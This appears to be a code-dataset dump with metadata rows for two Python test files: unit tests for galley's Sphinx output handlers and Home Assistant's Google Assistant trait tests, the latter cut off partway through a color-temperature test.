hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8a1b0ef48e7f487cff69b0215a3359dc6beb9621
| 8,075
|
py
|
Python
|
tests/worker/test_outputhandlers.py
|
pybee/galley
|
d3bff4b64df03cc6576ebb7546e1ecacbb48e02a
|
[
"BSD-3-Clause"
] | 21
|
2015-01-21T23:56:56.000Z
|
2018-09-05T06:36:55.000Z
|
tests/worker/test_outputhandlers.py
|
pybee/galley
|
d3bff4b64df03cc6576ebb7546e1ecacbb48e02a
|
[
"BSD-3-Clause"
] | 9
|
2015-01-22T01:57:27.000Z
|
2018-04-09T04:03:32.000Z
|
tests/worker/test_outputhandlers.py
|
pybee/galley
|
d3bff4b64df03cc6576ebb7546e1ecacbb48e02a
|
[
"BSD-3-Clause"
] | 7
|
2015-01-21T23:57:00.000Z
|
2017-01-14T01:24:35.000Z
|
import unittest
try:
from Queue import Queue
except ImportError:
from queue import Queue # python 3.x
from galley.worker import (
ANSIOutputHandler,
SphinxStatusHandler,
SphinxWarningHandler,
Output,
WarningOutput,
Progress,
)
class ANSIOutputHandlerTest(unittest.TestCase):
    """Exercise ANSIOutputHandler: ANSI escapes are stripped, and newline or
    carriage-return characters flush completed lines onto the queue."""

    def setUp(self):
        self.queue = Queue()
        self.handler = ANSIOutputHandler(self.queue)

    def _next_output(self):
        # Pull the next queued item without blocking.
        return self.queue.get(block=False)

    def test_simple_string(self):
        "A simple string can be output and flushed"
        self.handler.write("hello world")
        self.handler.flush()
        self.assertEqual(self._next_output(), Output(message='hello world'))
        # The queue must now be fully drained.
        self.assertTrue(self.queue.empty())

    def test_single_param_ansi_string(self):
        # A single-parameter ANSI escape code is removed from the output.
        self.handler.write("hello\x1b[1m world")
        self.handler.flush()
        self.assertEqual(self._next_output(), Output(message='hello world'))
        self.assertTrue(self.queue.empty())

    def test_multi_param_ansi_string(self):
        # A multi-parameter ANSI escape code is removed from the output.
        self.handler.write("hello\x1b[32;40m world")
        self.handler.flush()
        self.assertEqual(self._next_output(), Output(message='hello world'))
        self.assertTrue(self.queue.empty())

    def test_newline_flush(self):
        # Each newline implicitly flushes the completed line.
        self.handler.write("hello world\ngoodbye world\n")
        self.assertEqual(self._next_output(), Output(message='hello world'))
        self.assertEqual(self._next_output(), Output(message='goodbye world'))
        self.assertTrue(self.queue.empty())

    def test_carriage_return_flush(self):
        # Carriage returns act as line terminators as well.
        self.handler.write("hello world\rgoodbye world\r")
        self.assertEqual(self._next_output(), Output(message='hello world'))
        self.assertEqual(self._next_output(), Output(message='goodbye world'))
        self.assertTrue(self.queue.empty())
class SphinxStatusHandlerTest(unittest.TestCase):
    """Exercise SphinxStatusHandler: raw output passthrough, whitespace
    stripping, and extraction of task/percentage progress messages."""

    def setUp(self):
        self.queue = Queue()
        self.handler = SphinxStatusHandler(self.queue)

    def _next_output(self):
        # Pull the next queued item without blocking.
        return self.queue.get(block=False)

    def test_simple_message(self):
        "A simple string can be output and flushed"
        self.handler.write("hello world")
        self.handler.flush()
        self.assertEqual(self._next_output(), Output(message='hello world'))
        # The queue must now be fully drained.
        self.assertTrue(self.queue.empty())

    def test_stripping(self):
        "Messages are stripped; empty messages aren't sent"
        self.handler.write(" prefix\nsuffix \n \n\n both ")
        self.handler.flush()
        # Whitespace-only lines are dropped; the rest arrive trimmed.
        for expected in ('prefix', 'suffix', 'both'):
            self.assertEqual(self._next_output(), Output(message=expected))
        self.assertTrue(self.queue.empty())

    def test_simple_progress(self):
        "Simple tasks are identified and reported."
        # Starting a task only produces the raw output...
        self.handler.write("dumping object inventory...")
        self.handler.flush()
        self.assertEqual(
            self._next_output(), Output(message="dumping object inventory...")
        )
        self.assertTrue(self.queue.empty())
        # ...but completing it emits the raw output *and* a Progress message.
        self.handler.write("done")
        self.handler.flush()
        self.assertEqual(self._next_output(), Output(message="done"))
        self.assertEqual(
            self._next_output(),
            Progress(stage='dumping object inventory', progress=100, context=None)
        )
        self.assertTrue(self.queue.empty())
        # Completion clears the task state; later output is raw only.
        self.handler.write("More stuff done.")
        self.handler.flush()
        self.assertEqual(self._next_output(), Output(message="More stuff done."))
        self.assertTrue(self.queue.empty())

    def test_percent_progress(self):
        "Progress indicators are extracted and sent as parsed messages"
        status_lines = [
            ("copying downloadable files... [ 2%] /path/to/file.sh",
             2, '/path/to/file.sh'),
            ("copying downloadable files... [ 80%] /path/to/other_file.bat",
             80, '/path/to/other_file.bat'),
            ("copying downloadable files... [100%] /path/to/3rd-file.sh",
             100, '/path/to/3rd-file.sh'),
        ]
        for raw, _, _ in status_lines:
            self.handler.write(raw)
            self.handler.flush()
        # Output arrives in pairs: the raw message, then the parsed Progress.
        for raw, percent, path in status_lines:
            self.assertEqual(self._next_output(), Output(message=raw))
            self.assertEqual(
                self._next_output(),
                Progress(
                    stage='copying downloadable files',
                    progress=percent,
                    context=path,
                )
            )
        self.assertTrue(self.queue.empty())
class SphinxWarningHandlerTest(unittest.TestCase):
    """Exercise SphinxWarningHandler: warning lines are parsed into
    WarningOutput(filename, lineno, message) values."""

    def setUp(self):
        self.queue = Queue()
        self.handler = SphinxWarningHandler(self.queue)

    def test_global_warning(self):
        "A global warning message is parsed correctly"
        self.handler.write("WARNING: html_static_path entry '/beeware/galley/docs/_static' does not exist")
        self.handler.flush()
        output = self.queue.get(block=False)
        # No filename prefix, so both filename and lineno are None.
        self.assertEqual(output, WarningOutput(filename=None, lineno=None, message="html_static_path entry '/beeware/galley/docs/_static' does not exist"))
        # Nothing left in the queue
        self.assertTrue(self.queue.empty())

    def test_file_warning(self):
        "A warning message that mentions a filename is parsed for file name/number content"
        self.handler.write("/beeware/galley/docs/internals/newfile.rst:: WARNING: document isn't included in any toctree")
        self.handler.flush()
        output = self.queue.get(block=False)
        # Filename is present but the line-number slot ('::') is empty.
        self.assertEqual(output, WarningOutput(filename='/beeware/galley/docs/internals/newfile.rst', lineno=None, message="document isn't included in any toctree"))
        # Nothing left in the queue
        self.assertTrue(self.queue.empty())

    def test_file_warning_with_lineno(self):
        "A warning message with a filename and line number is parsed for both"
        # BUG FIX: this method was previously also named test_file_warning,
        # which shadowed the test above so that it never ran.
        self.handler.write("/beeware/galley/docs/index.rst:65: WARNING: toctree glob pattern u'releases' didn't match any documents")
        self.handler.flush()
        output = self.queue.get(block=False)
        self.assertEqual(output, WarningOutput(filename='/beeware/galley/docs/index.rst', lineno=65, message="toctree glob pattern u'releases' didn't match any documents"))
        # Nothing left in the queue
        self.assertTrue(self.queue.empty())
| 36.049107
| 172
| 0.665139
| 1,000
| 8,075
| 5.334
| 0.16
| 0.074241
| 0.067492
| 0.08099
| 0.78384
| 0.766779
| 0.756655
| 0.731534
| 0.724409
| 0.67754
| 0
| 0.005702
| 0.218081
| 8,075
| 223
| 173
| 36.210762
| 0.839088
| 0.140186
| 0
| 0.540146
| 0
| 0.014599
| 0.244978
| 0.037866
| 0
| 0
| 0
| 0
| 0.277372
| 1
| 0.109489
| false
| 0
| 0.036496
| 0
| 0.167883
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8a1d7384729b04b7f9c82fdeb3c5b26953684ce3
| 55,320
|
py
|
Python
|
tests/components/google_assistant/test_trait.py
|
Martwall/home-assistant
|
d377da80a469facfd722d065ecd60610190d9064
|
[
"Apache-2.0"
] | 1
|
2019-12-15T16:49:37.000Z
|
2019-12-15T16:49:37.000Z
|
tests/components/google_assistant/test_trait.py
|
Martwall/home-assistant
|
d377da80a469facfd722d065ecd60610190d9064
|
[
"Apache-2.0"
] | null | null | null |
tests/components/google_assistant/test_trait.py
|
Martwall/home-assistant
|
d377da80a469facfd722d065ecd60610190d9064
|
[
"Apache-2.0"
] | null | null | null |
"""Tests for the Google Assistant traits."""
import logging
from unittest.mock import Mock, patch
import pytest
from homeassistant.components import (
alarm_control_panel,
binary_sensor,
camera,
cover,
fan,
group,
input_boolean,
light,
lock,
media_player,
scene,
script,
sensor,
switch,
vacuum,
)
from homeassistant.components.climate import const as climate
from homeassistant.components.google_assistant import const, error, helpers, trait
from homeassistant.const import (
ATTR_ASSUMED_STATE,
ATTR_DEVICE_CLASS,
ATTR_ENTITY_ID,
ATTR_SUPPORTED_FEATURES,
ATTR_TEMPERATURE,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_ALARM_ARMED_AWAY,
STATE_ALARM_DISARMED,
STATE_ALARM_PENDING,
STATE_OFF,
STATE_ON,
STATE_UNKNOWN,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
)
from homeassistant.core import DOMAIN as HA_DOMAIN, EVENT_CALL_SERVICE, State
from homeassistant.util import color
from . import BASIC_CONFIG, MockConfig
from tests.common import async_mock_service, mock_coro
# Module-level logger for these tests.
_LOGGER = logging.getLogger(__name__)
# Fixed request ID shared by every trait execute() call in this module.
REQ_ID = "ff36a3cc-ec34-11e6-b1a0-64510650abcf"
BASIC_DATA = helpers.RequestData(BASIC_CONFIG, "test-agent", REQ_ID, None)
# Config/data pair for tests exercising PIN-protected (secure) devices.
PIN_CONFIG = MockConfig(secure_devices_pin="1234")
PIN_DATA = helpers.RequestData(PIN_CONFIG, "test-agent", REQ_ID, None)
async def test_brightness_light(hass):
    """Test brightness trait support for light domain."""
    assert helpers.get_google_type(light.DOMAIN, None) is not None
    assert trait.BrightnessTrait.supported(light.DOMAIN, light.SUPPORT_BRIGHTNESS, None)
    trt = trait.BrightnessTrait(
        hass,
        State("light.bla", light.STATE_ON, {light.ATTR_BRIGHTNESS: 243}),
        BASIC_CONFIG,
    )
    assert trt.sync_attributes() == {}
    # Raw brightness 243 (of 255) is reported as a 95% value.
    assert trt.query_attributes() == {"brightness": 95}
    # Listen for the service-call event so we can verify it fires below.
    events = []
    hass.bus.async_listen(EVENT_CALL_SERVICE, events.append)
    calls = async_mock_service(hass, light.DOMAIN, light.SERVICE_TURN_ON)
    await trt.execute(
        trait.COMMAND_BRIGHTNESS_ABSOLUTE, BASIC_DATA, {"brightness": 50}, {}
    )
    await hass.async_block_till_done()
    # The requested percentage is forwarded as brightness_pct on turn_on.
    assert len(calls) == 1
    assert calls[0].data == {ATTR_ENTITY_ID: "light.bla", light.ATTR_BRIGHTNESS_PCT: 50}
    # Executing the command also fires exactly one call_service event.
    assert len(events) == 1
    assert events[0].data == {
        "domain": "light",
        "service": "turn_on",
        "service_data": {"brightness_pct": 50, "entity_id": "light.bla"},
    }
async def test_camera_stream(hass):
    """Test camera stream trait support for camera domain."""
    # Stream URLs are built against the instance's configured base URL.
    hass.config.api = Mock(base_url="http://1.1.1.1:8123")
    assert helpers.get_google_type(camera.DOMAIN, None) is not None
    assert trait.CameraStreamTrait.supported(camera.DOMAIN, camera.SUPPORT_STREAM, None)
    trt = trait.CameraStreamTrait(
        hass, State("camera.bla", camera.STATE_IDLE, {}), BASIC_CONFIG
    )
    assert trt.sync_attributes() == {
        "cameraStreamSupportedProtocols": ["hls"],
        "cameraStreamNeedAuthToken": False,
        "cameraStreamNeedDrmEncryption": False,
    }
    # No stream has been requested yet, so there is nothing to report.
    assert trt.query_attributes() == {}
    with patch(
        "homeassistant.components.camera.async_request_stream",
        return_value=mock_coro("/api/streams/bla"),
    ):
        await trt.execute(trait.COMMAND_GET_CAMERA_STREAM, BASIC_DATA, {}, {})
    # After execute, the stream path is exposed as an absolute access URL.
    assert trt.query_attributes() == {
        "cameraStreamAccessUrl": "http://1.1.1.1:8123/api/streams/bla"
    }
async def test_onoff_group(hass):
    """Test OnOff trait support for group domain."""
    assert helpers.get_google_type(group.DOMAIN, None) is not None
    assert trait.OnOffTrait.supported(group.DOMAIN, 0, None)
    # The trait mirrors the entity's current on/off state.
    on_trait = trait.OnOffTrait(hass, State("group.bla", STATE_ON), BASIC_CONFIG)
    assert on_trait.sync_attributes() == {}
    assert on_trait.query_attributes() == {"on": True}
    off_trait = trait.OnOffTrait(hass, State("group.bla", STATE_OFF), BASIC_CONFIG)
    assert off_trait.query_attributes() == {"on": False}
    # "on": True routes through the homeassistant-domain turn_on service.
    turn_on_calls = async_mock_service(hass, HA_DOMAIN, SERVICE_TURN_ON)
    await on_trait.execute(trait.COMMAND_ONOFF, BASIC_DATA, {"on": True}, {})
    assert len(turn_on_calls) == 1
    assert turn_on_calls[0].data == {ATTR_ENTITY_ID: "group.bla"}
    # "on": False routes through the homeassistant-domain turn_off service.
    turn_off_calls = async_mock_service(hass, HA_DOMAIN, SERVICE_TURN_OFF)
    await on_trait.execute(trait.COMMAND_ONOFF, BASIC_DATA, {"on": False}, {})
    assert len(turn_off_calls) == 1
    assert turn_off_calls[0].data == {ATTR_ENTITY_ID: "group.bla"}
async def test_onoff_input_boolean(hass):
    """Test OnOff trait support for input_boolean domain."""
    assert helpers.get_google_type(input_boolean.DOMAIN, None) is not None
    assert trait.OnOffTrait.supported(input_boolean.DOMAIN, 0, None)
    # The trait mirrors the entity's current on/off state.
    on_trait = trait.OnOffTrait(hass, State("input_boolean.bla", STATE_ON), BASIC_CONFIG)
    assert on_trait.sync_attributes() == {}
    assert on_trait.query_attributes() == {"on": True}
    off_trait = trait.OnOffTrait(
        hass, State("input_boolean.bla", STATE_OFF), BASIC_CONFIG
    )
    assert off_trait.query_attributes() == {"on": False}
    # "on": True routes through the input_boolean turn_on service.
    turn_on_calls = async_mock_service(hass, input_boolean.DOMAIN, SERVICE_TURN_ON)
    await on_trait.execute(trait.COMMAND_ONOFF, BASIC_DATA, {"on": True}, {})
    assert len(turn_on_calls) == 1
    assert turn_on_calls[0].data == {ATTR_ENTITY_ID: "input_boolean.bla"}
    # "on": False routes through the input_boolean turn_off service.
    turn_off_calls = async_mock_service(hass, input_boolean.DOMAIN, SERVICE_TURN_OFF)
    await on_trait.execute(trait.COMMAND_ONOFF, BASIC_DATA, {"on": False}, {})
    assert len(turn_off_calls) == 1
    assert turn_off_calls[0].data == {ATTR_ENTITY_ID: "input_boolean.bla"}
async def test_onoff_switch(hass):
    """Test OnOff trait support for switch domain."""
    assert helpers.get_google_type(switch.DOMAIN, None) is not None
    assert trait.OnOffTrait.supported(switch.DOMAIN, 0, None)
    # The trait mirrors the entity's current on/off state.
    on_trait = trait.OnOffTrait(hass, State("switch.bla", STATE_ON), BASIC_CONFIG)
    assert on_trait.sync_attributes() == {}
    assert on_trait.query_attributes() == {"on": True}
    off_trait = trait.OnOffTrait(hass, State("switch.bla", STATE_OFF), BASIC_CONFIG)
    assert off_trait.query_attributes() == {"on": False}
    # "on": True routes through the switch turn_on service.
    turn_on_calls = async_mock_service(hass, switch.DOMAIN, SERVICE_TURN_ON)
    await on_trait.execute(trait.COMMAND_ONOFF, BASIC_DATA, {"on": True}, {})
    assert len(turn_on_calls) == 1
    assert turn_on_calls[0].data == {ATTR_ENTITY_ID: "switch.bla"}
    # "on": False routes through the switch turn_off service.
    turn_off_calls = async_mock_service(hass, switch.DOMAIN, SERVICE_TURN_OFF)
    await on_trait.execute(trait.COMMAND_ONOFF, BASIC_DATA, {"on": False}, {})
    assert len(turn_off_calls) == 1
    assert turn_off_calls[0].data == {ATTR_ENTITY_ID: "switch.bla"}
async def test_onoff_fan(hass):
    """Test OnOff trait support for fan domain."""
    assert helpers.get_google_type(fan.DOMAIN, None) is not None
    assert trait.OnOffTrait.supported(fan.DOMAIN, 0, None)
    # The trait mirrors the entity's current on/off state.
    on_trait = trait.OnOffTrait(hass, State("fan.bla", STATE_ON), BASIC_CONFIG)
    assert on_trait.sync_attributes() == {}
    assert on_trait.query_attributes() == {"on": True}
    off_trait = trait.OnOffTrait(hass, State("fan.bla", STATE_OFF), BASIC_CONFIG)
    assert off_trait.query_attributes() == {"on": False}
    # "on": True routes through the fan turn_on service.
    turn_on_calls = async_mock_service(hass, fan.DOMAIN, SERVICE_TURN_ON)
    await on_trait.execute(trait.COMMAND_ONOFF, BASIC_DATA, {"on": True}, {})
    assert len(turn_on_calls) == 1
    assert turn_on_calls[0].data == {ATTR_ENTITY_ID: "fan.bla"}
    # "on": False routes through the fan turn_off service.
    turn_off_calls = async_mock_service(hass, fan.DOMAIN, SERVICE_TURN_OFF)
    await on_trait.execute(trait.COMMAND_ONOFF, BASIC_DATA, {"on": False}, {})
    assert len(turn_off_calls) == 1
    assert turn_off_calls[0].data == {ATTR_ENTITY_ID: "fan.bla"}
async def test_onoff_light(hass):
    """Test OnOff trait support for light domain."""
    assert helpers.get_google_type(light.DOMAIN, None) is not None
    assert trait.OnOffTrait.supported(light.DOMAIN, 0, None)
    # The trait mirrors the entity's current on/off state.
    on_trait = trait.OnOffTrait(hass, State("light.bla", STATE_ON), BASIC_CONFIG)
    assert on_trait.sync_attributes() == {}
    assert on_trait.query_attributes() == {"on": True}
    off_trait = trait.OnOffTrait(hass, State("light.bla", STATE_OFF), BASIC_CONFIG)
    assert off_trait.query_attributes() == {"on": False}
    # "on": True routes through the light turn_on service.
    turn_on_calls = async_mock_service(hass, light.DOMAIN, SERVICE_TURN_ON)
    await on_trait.execute(trait.COMMAND_ONOFF, BASIC_DATA, {"on": True}, {})
    assert len(turn_on_calls) == 1
    assert turn_on_calls[0].data == {ATTR_ENTITY_ID: "light.bla"}
    # "on": False routes through the light turn_off service.
    turn_off_calls = async_mock_service(hass, light.DOMAIN, SERVICE_TURN_OFF)
    await on_trait.execute(trait.COMMAND_ONOFF, BASIC_DATA, {"on": False}, {})
    assert len(turn_off_calls) == 1
    assert turn_off_calls[0].data == {ATTR_ENTITY_ID: "light.bla"}
async def test_onoff_media_player(hass):
    """Test OnOff trait support for media_player domain."""
    assert helpers.get_google_type(media_player.DOMAIN, None) is not None
    assert trait.OnOffTrait.supported(media_player.DOMAIN, 0, None)
    # The trait mirrors the entity's current on/off state.
    on_trait = trait.OnOffTrait(hass, State("media_player.bla", STATE_ON), BASIC_CONFIG)
    assert on_trait.sync_attributes() == {}
    assert on_trait.query_attributes() == {"on": True}
    off_trait = trait.OnOffTrait(hass, State("media_player.bla", STATE_OFF), BASIC_CONFIG)
    assert off_trait.query_attributes() == {"on": False}
    # "on": True routes through the media_player turn_on service.
    turn_on_calls = async_mock_service(hass, media_player.DOMAIN, SERVICE_TURN_ON)
    await on_trait.execute(trait.COMMAND_ONOFF, BASIC_DATA, {"on": True}, {})
    assert len(turn_on_calls) == 1
    assert turn_on_calls[0].data == {ATTR_ENTITY_ID: "media_player.bla"}
    # "on": False routes through the media_player turn_off service.
    turn_off_calls = async_mock_service(hass, media_player.DOMAIN, SERVICE_TURN_OFF)
    await on_trait.execute(trait.COMMAND_ONOFF, BASIC_DATA, {"on": False}, {})
    assert len(turn_off_calls) == 1
    assert turn_off_calls[0].data == {ATTR_ENTITY_ID: "media_player.bla"}
async def test_dock_vacuum(hass):
    """Test dock trait support for vacuum domain."""
    assert helpers.get_google_type(vacuum.DOMAIN, None) is not None
    assert trait.DockTrait.supported(vacuum.DOMAIN, 0, None)
    # An idle vacuum reports as not docked.
    dock_trait = trait.DockTrait(hass, State("vacuum.bla", vacuum.STATE_IDLE), BASIC_CONFIG)
    assert dock_trait.sync_attributes() == {}
    assert dock_trait.query_attributes() == {"isDocked": False}
    # The Dock command maps onto the return_to_base service.
    return_calls = async_mock_service(hass, vacuum.DOMAIN, vacuum.SERVICE_RETURN_TO_BASE)
    await dock_trait.execute(trait.COMMAND_DOCK, BASIC_DATA, {}, {})
    assert len(return_calls) == 1
    assert return_calls[0].data == {ATTR_ENTITY_ID: "vacuum.bla"}
async def test_startstop_vacuum(hass):
    """Test startStop trait support for vacuum domain."""
    assert helpers.get_google_type(vacuum.DOMAIN, None) is not None
    assert trait.StartStopTrait.supported(vacuum.DOMAIN, 0, None)
    trt = trait.StartStopTrait(
        hass,
        State(
            "vacuum.bla",
            vacuum.STATE_PAUSED,
            {ATTR_SUPPORTED_FEATURES: vacuum.SUPPORT_PAUSE},
        ),
        BASIC_CONFIG,
    )
    # SUPPORT_PAUSE makes the device advertise as pausable.
    assert trt.sync_attributes() == {"pausable": True}
    # A paused vacuum is "not running" but "paused".
    assert trt.query_attributes() == {"isRunning": False, "isPaused": True}
    start_calls = async_mock_service(hass, vacuum.DOMAIN, vacuum.SERVICE_START)
    await trt.execute(trait.COMMAND_STARTSTOP, BASIC_DATA, {"start": True}, {})
    assert len(start_calls) == 1
    assert start_calls[0].data == {ATTR_ENTITY_ID: "vacuum.bla"}
    stop_calls = async_mock_service(hass, vacuum.DOMAIN, vacuum.SERVICE_STOP)
    await trt.execute(trait.COMMAND_STARTSTOP, BASIC_DATA, {"start": False}, {})
    assert len(stop_calls) == 1
    assert stop_calls[0].data == {ATTR_ENTITY_ID: "vacuum.bla"}
    pause_calls = async_mock_service(hass, vacuum.DOMAIN, vacuum.SERVICE_PAUSE)
    await trt.execute(trait.COMMAND_PAUSEUNPAUSE, BASIC_DATA, {"pause": True}, {})
    assert len(pause_calls) == 1
    assert pause_calls[0].data == {ATTR_ENTITY_ID: "vacuum.bla"}
    # Unpausing reuses the start service rather than a dedicated one.
    unpause_calls = async_mock_service(hass, vacuum.DOMAIN, vacuum.SERVICE_START)
    await trt.execute(trait.COMMAND_PAUSEUNPAUSE, BASIC_DATA, {"pause": False}, {})
    assert len(unpause_calls) == 1
    assert unpause_calls[0].data == {ATTR_ENTITY_ID: "vacuum.bla"}
async def test_color_setting_color_light(hass):
    """Test ColorSpectrum trait support for light domain."""
    assert helpers.get_google_type(light.DOMAIN, None) is not None
    # Color support is required; a bare light does not get the trait.
    assert not trait.ColorSettingTrait.supported(light.DOMAIN, 0, None)
    assert trait.ColorSettingTrait.supported(light.DOMAIN, light.SUPPORT_COLOR, None)
    trt = trait.ColorSettingTrait(
        hass,
        State(
            "light.bla",
            STATE_ON,
            {
                light.ATTR_HS_COLOR: (20, 94),
                light.ATTR_BRIGHTNESS: 200,
                ATTR_SUPPORTED_FEATURES: light.SUPPORT_COLOR,
            },
        ),
        BASIC_CONFIG,
    )
    assert trt.sync_attributes() == {"colorModel": "hsv"}
    # HS (20, 94) + brightness 200 become Google HSV: saturation scaled to
    # 0-1 and value derived from brightness/255.
    assert trt.query_attributes() == {
        "color": {"spectrumHsv": {"hue": 20, "saturation": 0.94, "value": 200 / 255}}
    }
    assert trt.can_execute(
        trait.COMMAND_COLOR_ABSOLUTE, {"color": {"spectrumRGB": 16715792}}
    )
    calls = async_mock_service(hass, light.DOMAIN, SERVICE_TURN_ON)
    # A spectrumRGB color is converted into an hs_color service argument.
    await trt.execute(
        trait.COMMAND_COLOR_ABSOLUTE,
        BASIC_DATA,
        {"color": {"spectrumRGB": 1052927}},
        {},
    )
    assert len(calls) == 1
    assert calls[0].data == {
        ATTR_ENTITY_ID: "light.bla",
        light.ATTR_HS_COLOR: (240, 93.725),
    }
    # A spectrumHSV color maps hue/saturation to hs_color and value to
    # brightness (value * 255).
    await trt.execute(
        trait.COMMAND_COLOR_ABSOLUTE,
        BASIC_DATA,
        {"color": {"spectrumHSV": {"hue": 100, "saturation": 0.50, "value": 0.20}}},
        {},
    )
    assert len(calls) == 2
    assert calls[1].data == {
        ATTR_ENTITY_ID: "light.bla",
        light.ATTR_HS_COLOR: [100, 50],
        light.ATTR_BRIGHTNESS: 0.2 * 255,
    }
async def test_color_setting_temperature_light(hass):
    """Test ColorTemperature trait support for light domain."""
    assert helpers.get_google_type(light.DOMAIN, None) is not None
    # Color-temperature support is required for the trait.
    assert not trait.ColorSettingTrait.supported(light.DOMAIN, 0, None)
    assert trait.ColorSettingTrait.supported(
        light.DOMAIN, light.SUPPORT_COLOR_TEMP, None
    )
    trt = trait.ColorSettingTrait(
        hass,
        State(
            "light.bla",
            STATE_ON,
            {
                light.ATTR_MIN_MIREDS: 200,
                light.ATTR_COLOR_TEMP: 300,
                light.ATTR_MAX_MIREDS: 500,
                ATTR_SUPPORTED_FEATURES: light.SUPPORT_COLOR_TEMP,
            },
        ),
        BASIC_CONFIG,
    )
    # Mired limits 200-500 invert into a Kelvin range of 5000 down to 2000.
    assert trt.sync_attributes() == {
        "colorTemperatureRange": {"temperatureMinK": 2000, "temperatureMaxK": 5000}
    }
    # The current 300 mireds are reported as 3333 K.
    assert trt.query_attributes() == {"color": {"temperatureK": 3333}}
    assert trt.can_execute(
        trait.COMMAND_COLOR_ABSOLUTE, {"color": {"temperature": 400}}
    )
    calls = async_mock_service(hass, light.DOMAIN, SERVICE_TURN_ON)
    # A temperature beyond the light's Kelvin range must be rejected.
    with pytest.raises(helpers.SmartHomeError) as err:
        await trt.execute(
            trait.COMMAND_COLOR_ABSOLUTE,
            BASIC_DATA,
